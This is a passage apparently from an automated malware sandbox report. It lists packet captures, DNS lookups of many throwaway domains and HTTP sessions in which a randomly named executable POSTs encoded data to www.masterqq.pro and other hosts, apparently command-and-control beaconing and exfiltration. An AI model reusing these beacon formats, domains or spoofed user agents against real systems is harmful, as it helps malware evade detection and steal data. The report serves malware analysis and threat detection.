                                                                                                                                      Jan 11, 2025 09:40:27.503035069 CET5006980192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:27.507966995 CET805006913.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:27.958606005 CET805006913.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:27.958626032 CET805006913.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:27.958739996 CET5006980192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:27.961791992 CET5006980192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:27.967160940 CET805006913.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:28.314284086 CET805006813.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:28.314351082 CET5006880192.168.2.413.248.169.48

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Jan 11, 2025 09:36:21.246649981 CET6190353192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:36:21.260143995 CET53619031.1.1.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:36:36.815907001 CET5314653192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:36:36.828978062 CET53531461.1.1.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:36:50.111982107 CET6230453192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:36:50.224997997 CET53623041.1.1.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:11.366470098 CET4925453192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:37:11.380100965 CET53492541.1.1.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:24.673515081 CET5122853192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:37:24.777404070 CET53512281.1.1.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:32.831147909 CET5305153192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:37:32.843305111 CET53530511.1.1.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:40.936649084 CET5383253192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:37:40.948688984 CET53538321.1.1.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:54.096574068 CET5859153192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:37:54.455653906 CET53585911.1.1.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:08.330676079 CET6023753192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:38:08.352806091 CET53602371.1.1.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:21.658438921 CET5734953192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:38:21.835967064 CET53573491.1.1.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:34.987210989 CET6401453192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:38:35.218882084 CET53640141.1.1.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:49.019220114 CET5534553192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:38:49.035897970 CET53553451.1.1.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:03.174228907 CET6508253192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:39:03.563486099 CET53650821.1.1.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:16.831227064 CET5172853192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:39:16.842456102 CET53517281.1.1.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:30.238311052 CET5887653192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:39:30.466516972 CET53588761.1.1.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:44.283560038 CET5163253192.168.2.41.1.1.1
                                                                                                                                      Jan 11, 2025 09:39:44.298317909 CET53516321.1.1.1192.168.2.4

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Jan 11, 2025 09:36:21.246649981 CET192.168.2.41.1.1.10x136bStandard query (0)www.dojodigitize.shopA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:36:36.815907001 CET192.168.2.41.1.1.10x5dc9Standard query (0)www.masterqq.proA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:36:50.111982107 CET192.168.2.41.1.1.10xcb23Standard query (0)www.hasan.cloudA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:11.366470098 CET192.168.2.41.1.1.10xd3b0Standard query (0)www.0be.infoA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:24.673515081 CET192.168.2.41.1.1.10x8331Standard query (0)www.tageting.shopA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:32.831147909 CET192.168.2.41.1.1.10xb6a5Standard query (0)www.ulojenukw.shopA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:40.936649084 CET192.168.2.41.1.1.10xf0Standard query (0)www.ssps.shopA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:54.096574068 CET192.168.2.41.1.1.10x98d9Standard query (0)www.qqc5.topA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:08.330676079 CET192.168.2.41.1.1.10x6569Standard query (0)www.learnnow.infoA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:21.658438921 CET192.168.2.41.1.1.10x7718Standard query (0)www.goldbracelet.topA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:34.987210989 CET192.168.2.41.1.1.10xf26dStandard query (0)www.regislemberthe.onlineA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:49.019220114 CET192.168.2.41.1.1.10x40f4Standard query (0)www.honk.cityA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:39:03.174228907 CET192.168.2.41.1.1.10x4cafStandard query (0)www.gupiao.betA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:39:16.831227064 CET192.168.2.41.1.1.10xa0e4Standard query (0)www.fengzheng.shopA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:39:30.238311052 CET192.168.2.41.1.1.10x70bfStandard query (0)www.joeltcarpenter.onlineA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:39:44.283560038 CET192.168.2.41.1.1.10x5282Standard query (0)www.incgruporxat.clickA (IP address)IN (0x0001)false

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Jan 11, 2025 09:36:21.260143995 CET1.1.1.1192.168.2.40x136bNo error (0)www.dojodigitize.shopdojodigitize.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:36:21.260143995 CET1.1.1.1192.168.2.40x136bNo error (0)dojodigitize.shop15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:36:21.260143995 CET1.1.1.1192.168.2.40x136bNo error (0)dojodigitize.shop3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:36:36.828978062 CET1.1.1.1192.168.2.40x5dc9No error (0)www.masterqq.pro104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:36:36.828978062 CET1.1.1.1192.168.2.40x5dc9No error (0)www.masterqq.pro104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:36:36.828978062 CET1.1.1.1192.168.2.40x5dc9No error (0)www.masterqq.pro104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:36:36.828978062 CET1.1.1.1192.168.2.40x5dc9No error (0)www.masterqq.pro104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:36:36.828978062 CET1.1.1.1192.168.2.40x5dc9No error (0)www.masterqq.pro104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:36:36.828978062 CET1.1.1.1192.168.2.40x5dc9No error (0)www.masterqq.pro104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:36:36.828978062 CET1.1.1.1192.168.2.40x5dc9No error (0)www.masterqq.pro104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:36:50.224997997 CET1.1.1.1192.168.2.40xcb23No error (0)www.hasan.cloud13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:36:50.224997997 CET1.1.1.1192.168.2.40xcb23No error (0)www.hasan.cloud76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:11.380100965 CET1.1.1.1192.168.2.40xd3b0No error (0)www.0be.info0be.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:11.380100965 CET1.1.1.1192.168.2.40xd3b0No error (0)0be.info173.0.157.187A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:24.777404070 CET1.1.1.1192.168.2.40x8331Server failure (2)www.tageting.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:32.843305111 CET1.1.1.1192.168.2.40xb6a5Server failure (2)www.ulojenukw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:40.948688984 CET1.1.1.1192.168.2.40xf0No error (0)www.ssps.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:40.948688984 CET1.1.1.1192.168.2.40xf0No error (0)www.ssps.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:54.455653906 CET1.1.1.1192.168.2.40x98d9No error (0)www.qqc5.topqqc5.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:54.455653906 CET1.1.1.1192.168.2.40x98d9No error (0)qqc5.top38.47.233.4A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:08.352806091 CET1.1.1.1192.168.2.40x6569No error (0)www.learnnow.info199.192.23.123A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:21.835967064 CET1.1.1.1192.168.2.40x7718No error (0)www.goldbracelet.top104.21.36.239A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:21.835967064 CET1.1.1.1192.168.2.40x7718No error (0)www.goldbracelet.top172.67.201.49A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:35.218882084 CET1.1.1.1192.168.2.40xf26dNo error (0)www.regislemberthe.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:49.035897970 CET1.1.1.1192.168.2.40x40f4No error (0)www.honk.city13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:49.035897970 CET1.1.1.1192.168.2.40x40f4No error (0)www.honk.city76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:39:03.563486099 CET1.1.1.1192.168.2.40x4cafNo error (0)www.gupiao.bet54.67.42.145A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:39:16.842456102 CET1.1.1.1192.168.2.40xa0e4No error (0)www.fengzheng.shop193.180.209.15A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:39:30.466516972 CET1.1.1.1192.168.2.40x70bfNo error (0)www.joeltcarpenter.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:39:44.298317909 CET1.1.1.1192.168.2.40x5282No error (0)www.incgruporxat.click104.21.88.139A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:39:44.298317909 CET1.1.1.1192.168.2.40x5282No error (0)www.incgruporxat.click172.67.180.24A (IP address)IN (0x0001)false

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • www.dojodigitize.shop
                                                                                                                                      • www.masterqq.pro
                                                                                                                                      • www.hasan.cloud
                                                                                                                                      • www.0be.info
                                                                                                                                      • www.ssps.shop
                                                                                                                                      • www.qqc5.top
                                                                                                                                      • www.learnnow.info
                                                                                                                                      • www.goldbracelet.top
                                                                                                                                      • www.regislemberthe.online
                                                                                                                                      • www.honk.city
                                                                                                                                      • www.gupiao.bet
                                                                                                                                      • www.fengzheng.shop
                                                                                                                                      • www.joeltcarpenter.online
                                                                                                                                      • www.incgruporxat.click

                                                                                                                                      HTTP Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.44974115.197.142.173804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:36:21.291078091 CET444OUTGET /zxe0/?sTS=El+NSyicP5BK/60Db2Xg1o31Ym1kL1m1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkDzccLdwJ4YQfOICjey7dRE9nJA6OdtOGEU=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.dojodigitize.shop
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:36:21.767122984 CET133INHTTP/1.1 404 Not Found
                                                                                                                                      Server: awselb/2.0
                                                                                                                                      Date: Sat, 11 Jan 2025 08:36:21 GMT
                                                                                                                                      Content-Length: 0
                                                                                                                                      Connection: close
                                                                                                                                      WAFRule: 5


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.449742104.21.80.1804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:36:36.856225014 CET702OUTPOST /vfw3/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.masterqq.pro
                                                                                                                                      Referer: http://www.masterqq.pro/vfw3/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 6d 6f 49 59 76 59 71 37 45 45 76 56 55 52 61 38 46 33 5a 66 5a 4a 4b 4c 54 56 49 30 37 72 41 69 57 4e 55 33 51 53 43 61 6f 76 4c 34 6a 53 47 4e 78 34 61 52 66 38 48 2b 64 44 75 6e 61 54 2f 64 67 62 56 34 61 70 34 75 67 2f 31 53 6c 2f 4e 2b 51 74 79 58 53 74 64 7a 32 6e 38 74 7a 32 31 43 5a 2b 66 77 6b 50 51 2b 74 48 51 63 47 75 44 42 41 6b 39 56 4a 39 46 4f 4a 66 39 62 6a 4c 6b 4a 41 4f 41 7a 65 48 73 35 46 46 68 39 57 42 76 42 78 55 35 36 73 56 77 76 4d 4a 4f 65 30 51 4b 77 78 46 6f 77 43 50 58 75 50 78 61 2f 4a 36 52 42 2f 59 61 71 32 35 59 53 4c 54 42 65 48 30 76 5a 6a 77 3d 3d
                                                                                                                                      Data Ascii: sTS=moIYvYq7EEvVURa8F3ZfZJKLTVI07rAiWNU3QSCaovL4jSGNx4aRf8H+dDunaT/dgbV4ap4ug/1Sl/N+QtyXStdz2n8tz21CZ+fwkPQ+tHQcGuDBAk9VJ9FOJf9bjLkJAOAzeHs5FFh9WBvBxU56sVwvMJOe0QKwxFowCPXuPxa/J6RB/Yaq25YSLTBeH0vZjw==
                                                                                                                                      Jan 11, 2025 09:36:37.469358921 CET1043INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:36:37 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L9ymb4KrvUeLVcVZlhQFieLHHevruRqxD9R18QK2tUUi5e17NXSRR1gKvD%2Fx7zGFlpDt%2F7zh2wIa6bhHH9iwZCSjN2XpCAFsRotct7dxe4FQOaNhDem6C6c52NzuRXh9bhjm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 90039484caad43ee-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1700&rtt_var=850&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=702&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 65 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e0LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8*Y60


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.449743104.21.80.1804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:36:39.397872925 CET722OUTPOST /vfw3/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.masterqq.pro
                                                                                                                                      Referer: http://www.masterqq.pro/vfw3/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 6d 6f 49 59 76 59 71 37 45 45 76 56 53 78 71 38 45 55 78 66 52 4a 4b 4d 4b 6c 49 30 78 4c 41 6d 57 4e 59 33 51 54 47 4b 6f 61 54 34 6b 79 32 4e 2b 63 4f 52 65 38 48 2b 58 6a 75 69 51 7a 2f 47 67 62 5a 77 61 74 34 75 67 2f 68 53 6c 39 56 2b 51 61 75 59 54 39 64 78 77 6e 38 76 33 32 31 43 5a 2b 66 77 6b 50 45 41 74 48 49 63 48 65 7a 42 41 47 56 55 50 4e 46 4e 4f 66 39 62 6e 4c 6b 46 41 4f 41 64 65 47 78 6b 46 47 56 39 57 41 66 42 79 46 35 35 69 56 77 74 50 35 50 37 7a 51 50 47 38 6d 45 39 41 2f 37 69 46 52 4c 63 46 63 63 62 75 70 37 39 6b 35 38 68 57 55 49 71 4b 33 53 51 34 77 2f 6b 52 4b 58 67 47 53 41 59 6a 69 4e 56 6a 45 4c 2f 33 57 55 3d
                                                                                                                                      Data Ascii: sTS=moIYvYq7EEvVSxq8EUxfRJKMKlI0xLAmWNY3QTGKoaT4ky2N+cORe8H+XjuiQz/GgbZwat4ug/hSl9V+QauYT9dxwn8v321CZ+fwkPEAtHIcHezBAGVUPNFNOf9bnLkFAOAdeGxkFGV9WAfByF55iVwtP5P7zQPG8mE9A/7iFRLcFccbup79k58hWUIqK3SQ4w/kRKXgGSAYjiNVjEL/3WU=
                                                                                                                                      Jan 11, 2025 09:36:39.976943016 CET1051INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:36:39 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DLxKC8RIvOvWYar4NPE6SghbWCE9mAlrjvLQ8mQG%2FhmsMgw3Pk6PWa5woNozuvvnTgwysMj8aSAqRMXp59ZvIOtcbs5oOBeVddBYpJ4Nw2tAtUgPD3NMfrVUp0unmcmwI4oj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 90039494ae68c443-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1616&rtt_var=808&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=722&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 64 36 0d 0a 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: fd6LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8*Y60


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.449744104.21.80.1804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:36:41.944499969 CET10804OUTPOST /vfw3/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.masterqq.pro
                                                                                                                                      Referer: http://www.masterqq.pro/vfw3/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 6d 6f 49 59 76 59 71 37 45 45 76 56 53 78 71 38 45 55 78 66 52 4a 4b 4d 4b 6c 49 30 78 4c 41 6d 57 4e 59 33 51 54 47 4b 6f 61 62 34 6a 41 2b 4e 78 64 4f 52 59 4d 48 2b 52 54 75 6a 51 7a 2b 65 67 66 31 30 61 74 30 2b 67 38 5a 53 71 38 31 2b 59 4c 75 59 59 39 64 78 79 6e 38 75 7a 32 30 41 5a 2b 76 30 6b 50 55 41 74 48 49 63 48 63 37 42 4a 30 39 55 4e 4e 46 4f 4a 66 38 61 6a 4c 6b 70 41 4f 6f 72 65 47 31 30 5a 67 6c 39 50 67 50 42 30 33 68 35 75 56 77 72 4b 35 50 5a 7a 52 7a 56 38 6e 70 4d 41 2f 2b 4e 46 54 58 63 56 64 42 41 7a 61 44 37 32 70 38 49 4b 55 77 65 4b 55 6e 56 39 48 6e 69 66 61 6a 4a 53 78 77 31 6f 52 6f 6e 38 6c 58 34 6f 69 77 74 6e 62 77 48 51 6f 31 62 41 69 54 76 48 4f 30 4f 58 31 7a 41 58 4d 38 32 4c 45 30 54 2b 33 6b 68 54 49 30 37 36 76 45 71 6f 59 79 6a 35 33 48 47 44 4b 32 63 35 75 6d 44 2b 47 53 36 6e 2f 68 78 57 75 6b 39 65 49 59 54 44 45 55 77 38 37 6d 4d 75 45 4e 34 46 67 46 7a 73 6a 74 74 58 59 79 32 63 72 68 33 63 68 30 68 39 31 65 42 37 7a 49 62 65 4c 65 49 51 4c [TRUNCATED]
                                                                                                                                      Data Ascii: sTS=moIYvYq7EEvVSxq8EUxfRJKMKlI0xLAmWNY3QTGKoab4jA+NxdORYMH+RTujQz+egf10at0+g8ZSq81+YLuYY9dxyn8uz20AZ+v0kPUAtHIcHc7BJ09UNNFOJf8ajLkpAOoreG10Zgl9PgPB03h5uVwrK5PZzRzV8npMA/+NFTXcVdBAzaD72p8IKUweKUnV9HnifajJSxw1oRon8lX4oiwtnbwHQo1bAiTvHO0OX1zAXM82LE0T+3khTI076vEqoYyj53HGDK2c5umD+GS6n/hxWuk9eIYTDEUw87mMuEN4FgFzsjttXYy2crh3ch0h91eB7zIbeLeIQLnCV0/8Y+UTaKPe5w2+zuMUdRWw10SdorsMOwASGWjIR0Dk7n7vm8V7dhgPYXWaWRd5Qq/+AjYCrbJKygIoggU39kkE1IivCrc6eDSjgCl8LHjzPV+dhx1/OS0RNbyBwhzW1ovm5Z5t2Y9Ec3srUiPtvu4EnAc/zrcJFZuRmT0Ecwqpl6hXf9Fb84x6IfmZTL4gTioDJWwmp7pAvGgm8SjM5hdWFeSvGB0HcVyMvg5fdCBQV/QhSaP0x+v4rHcl+8kxqZKcX4egoGUA6XnZkVy0mpgd31DI2JyVIZ/+cFg8SzGsmOrMYvdykUQ/BliBGi8NYXMrLCF6zk+Uwg5PmRWI8Cj2Lsneq4C+2LVeQIKo+qDoDNZttfvjnuPOUZKFz4lg6galcuokGdtO0W6Y0ug8/hWDk53vxOnU+mek7IhyH/K6ye/IgwRay5KiB3ic1Vvd9C6heRkKf1HqC2IRiQOS7Row1UJVLSGQVgLiXbfvawjhkdFX7+Q8J8EoJ2NgYIWYB/PV6E3RwtwgCiIG1YvTKbdnDFCUSmIOgHQjP5U8rgg5U/H7k5Id/gMPJezCOPMxt1yTVWFZouarDhRWI2NimOZ+MFw/H7ttQuH6BLjhU5D1x3slJuLE9EKuC5xrWDVISsoXHgnPLsFTsnD2QcR+4gtXINGWB0QQ [TRUNCATED]
                                                                                                                                      Jan 11, 2025 09:36:42.551419973 CET1050INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:36:42 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
